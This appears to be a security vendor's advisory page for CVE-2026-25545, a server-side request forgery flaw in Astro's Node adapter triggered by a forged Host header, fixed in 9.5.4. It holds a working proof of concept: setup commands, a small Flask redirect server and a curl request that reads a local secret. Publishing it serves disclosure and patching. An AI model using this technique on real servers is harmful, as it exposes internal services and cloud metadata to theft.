Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ CVE-2026-25545 — node

🟠 CVSS 8.6 — High ✅ No Known Exploit CWE-918 NVD
8.6
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Astro has Full-Read SSRF in error rendering via Host: header injection ### Summary Server-Side Rendered pages that return an error with a prerendered custom error page (eg. `404.astro` or `500.astro`) are vulnerable to SSRF. If the `Host:` header is changed to an attacker's server, it will be fetched on `/500.html` and they can redirect this to any internal URL to read the response body through the first request. ### Details The following line of code fetches `statusURL` and returns the response back to the client: https://github.com/withastro/astro/blob/bf0b4bfc7439ddc565f61a62037880e4e701eb05/packages/astro/src/core/app/base.ts#L534 `statusURL` comes from `this.baseWithoutTrailingSlash`, which [is built from the `Host:` header](https://github.com/withastro/astro/blob/e5e3208ee5041ad9cccd479c29a34bf6183a6505/packages/astro/src/core/app/node.ts#L81). `prerenderedErrorPageFetch()` is just `fetch()`, and **follows redirects**. This makes it possible for an attacker to set the `Host:` header to their server (eg. `Host: attacker.tld`), and if the server still receives the request without normalization, Astro will now fetch `http://attacker.tld/500.html`. The attacker can then redirect this request to http://localhost:8000/ssrf.txt, for example, to fetch any locally listening service. The response code is not checked, because as the comment in the code explains, this fetch may give a 200 OK. The body and headers are returned back to the attacker. Looking at the vulnerable code, the way to reach this is if the `renderError()` function is called (error response during SSR) and the error page is prerendered (custom `500.astro` error page). The PoC below shows how a basic project with these requirements can be set up. **Note**: Another common vulnerable pattern for `404.astro` we saw is: ```astro return new Response(null, {status: 404}); ``` Also, it does not matter what `allowedDomains` is set to, since it only checks the `X-Forwarded-Host:` header. https://github.com/withastro/astro/blob/9e16d63cdd2537c406e50d005b389ac115755e8e/packages/astro/src/core/app/base.ts#L146 ### PoC 1. Create a new empty project ```bash npm create astro@latest poc -- --template minimal --install --no-git --yes ``` 2. Create `poc/src/pages/error.astro` which throws an error with SSR: ```astro export const prerender = false; throw new Error("Test") ``` 3. Create `poc/src/pages/500.astro` with any content like: ```astro

500 Internal Server Error

``` 4. Build and run the app ```bash cd poc npx astro add node --yes npm run build && npm run preview ``` 5. Set up an "internal server" which we will SSRF to. Create a file called `ssrf.txt` and host it locally on http://localhost:8000: ```bash cd $(mktemp -d) echo "SECRET CONTENT" > ssrf.txt python3 -m http.server ``` 6. Set up attacker's server with exploit code and run it, so that its server becomes available on http://localhost:5000: ```python # pip install Flask from flask import Flask, redirect app = Flask(__name__) @app.route("/500.html") def exploit(): return redirect("http://127.0.0.1:8000/ssrf.txt") if __name__ == "__main__": app.run() ``` 7. Send the following request to the server, and notice the 500 error returns "SECRET CONTENT". ```shell $ curl -i http://localhost:4321/error -H 'Host: localhost:5000' HTTP/1.1 500 OK content-type: text/plain date: Tue, 03 Feb 2026 09:51:28 GMT last-modified: Tue, 03 Feb 2026 09:51:09 GMT server: SimpleHTTP/0.6 Python/3.12.3 Connection: keep-alive Keep-Alive: timeout=5 Transfer-Encoding: chunked SECRET CONTENT ``` ### Impact An attacker who can access the application without `Host:` header validation (eg. through finding the origin IP behind a proxy, or just by default) can fetch their own server to redirect to any internal IP. With this they can fetch cloud metadata IPs and interact with services in the internal network or localhost. For this to be vulnerable, [a common feature](https://docs.astro.build/en/basics/astro-pages/#custom-500-error-page) needs to be used, with direct access to the server (no proxies).

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is changed, meaning a successful attack can affect components beyond the vulnerable one. Rated impact: confidentiality high, integrity none, availability none.

CVSS metrics in full

The score comes from this vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

  • Attack vector: Network — reachable from anywhere that can route to the service.
  • Attack complexity: Low — the attack works reliably, with no preparation.
  • Privileges required: None — an unauthenticated stranger can try it.
  • User interaction: None — nobody has to be tricked into anything.
  • Scope: Changed — a successful attack reaches components beyond the vulnerable one.
  • Confidentiality impact: High — total loss, or loss the attacker controls.
  • Integrity impact: None.
  • Availability impact: None.

Weakness class

CVE-2026-25545 is classified as CWE-918: Server-Side Request Forgery (SSRF). The server fetches a URL supplied by the caller, which can be pointed at internal systems it alone can reach.

Affected software

CVE-2026-25545 is recorded against 2 packages.

  • @astrojs/node
  • \@astrojs\/node (fixed in 9.5.4)

Timeline and source

Published on 23 February 2026 and last revised on 30 March 2026. No public exploit is currently recorded for this entry. A vendor advisory or fix has been published. Record sourced from NVD.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
docs.astro.build (Web)
github.com (Package)
github.com (Web)

Other advisories for this package

@astrojs/node has other advisories on record. If you are patching this one, these are worth checking on the same host:

Same weakness in other software

These advisories are the same class of weakness (CWE-918: Server-Side Request Forgery (SSRF)) in other software:

Details

Severity High
CVSS Score 8.6
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CWE CWE-918
Public Exploit ✅ No
Source NVD
Published 2026-02-23
Updated 2026-08-20
Modified 2026-03-30

Affected Packages

Software From version Fixed in
@astrojs/node
\@astrojs\/node 9.5.4

Similar Threats

Site Security Check

Is node part of your stack?

CVE-2026-25545 is rated CVSS 8.6 High. BotEraser scans your installation against known CVE records and tells you whether this vulnerability applies to the versions you actually run.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2026